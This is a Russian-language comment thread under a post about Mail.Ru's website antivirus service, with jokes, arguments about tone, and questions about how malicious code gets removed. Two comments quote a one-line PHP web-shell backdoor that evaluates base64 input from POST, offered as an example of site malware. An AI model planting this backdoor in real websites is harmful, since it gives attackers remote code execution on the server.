Pull to refresh

Comments 20

Новый антивирус умеет удалять вредоносные утилиты от Mail.Ru?
UFO just landed and posted this here
Да если умудришься мэйл агент с гвардом и амиго себе на сайт установить — VD не только вылечит, но и премию выпишет… читайте текст, чтобы хоть в тему шутить, прежде чем «смешными» комментами «лойсы» собирать.
UFO just landed and posted this here
UFO just landed and posted this here
1. никто не обижался и не «тыкал», в данном случае это обращение не личное, а образному веб-разработчику
2. я не сотрудник мэйлру, да и на вашей карме свое отношение к вашему комменту не выражал, к чему паника то? )
Товарищ в самом верхнем комментарии, ведь не пошутил и количество "+" говорит само за себя!
3. Товарищ в верхнем комменте именно пошутил, возможно даже не прочитав самой публикации, на что я и ответил. Объясните мне суть этого «серьезного» комментария, его связь с комментируемой публикацией и каким образом антивирус для сайтов должен что-то делать на компьютере пользователя?
UFO just landed and posted this here
UFO just landed and posted this here
Он даже неостроумные шутки удалять умеет.
Теперь из блога Mail.ru пропадут все шутки?
он позволяет устранить вредоносный код (вирусы, шеллы и т.д.) на сайтах в автоматическом режиме и при этом не нарушить работоспособность веб-ресурса

Можно уточнить, что именно понимается под вредоносным кодом и как он (антивирус) так умудряется пофиксить сорцы, чтобы они продолжали после этого работать?
А что по вашему можно понимать под вредоносным кодом? Шелы, бэкдоры, спамботы и прочие вирусы, которые на мелких сайтах появляются постоянно. Например, самый простой, древний и всем известный вариант: <?php eval(base64_decode($_POST['code'])); ?> Если вы с этим не сталкивались — это еще не значит что вирусов на сайтах не бывает. Вредоносный код из файла можно вырезать, определив его начало и конец. Это можно делать вручную, если есть время на просмотр нескольких тысяч файлов на сайте, но такие задачи лучше автоматизировать. Естественно для лечения поверхностного скана недостаточно и для этого нужно зарегистрировать сайт на сервисе и разместить в корне специальный файл, через который будет удаленно осуществляться вся работа по поиску и удалению вирусов на сайте.
Вы слишком агрессивно восприняли мой комментарий, я писал без контекста, не ищите в нем подвоха. Как быть, если вредоносный код реализован автором сайта?
Вы не уточнили про то что код реализован автором сайта. По контенту в базе мы не ищем. Но вы спросили «как он так умудряется пофиксить сорцы». То есть вредоносный код в скриптах. Но если такой код присутствует в скриптах, значит он потенциально опасен и любой антивирус ищет угрозы независимо от того кем они были реализованы. В таком случае файл можно добавить в исключения и проверяться он не будет.
Я зашёл на эту страничку и антивирус начал ругаться. prntscr.com/7syekm
На хабре ни разу ни в одной статье такого не было.
image
Наверно от предыдущего комментария и ругается

<?php eval(base64_decode($_POST['code'])); ?>
Сервис абсолютная хрень. Заплатил за несколько сайтов. Пишет вирусов нет, а хостер блокирует отправку писем и присылает пути к зараженным файлам на лист А4.
Only those users with full accounts are able to leave comments. Log in, please.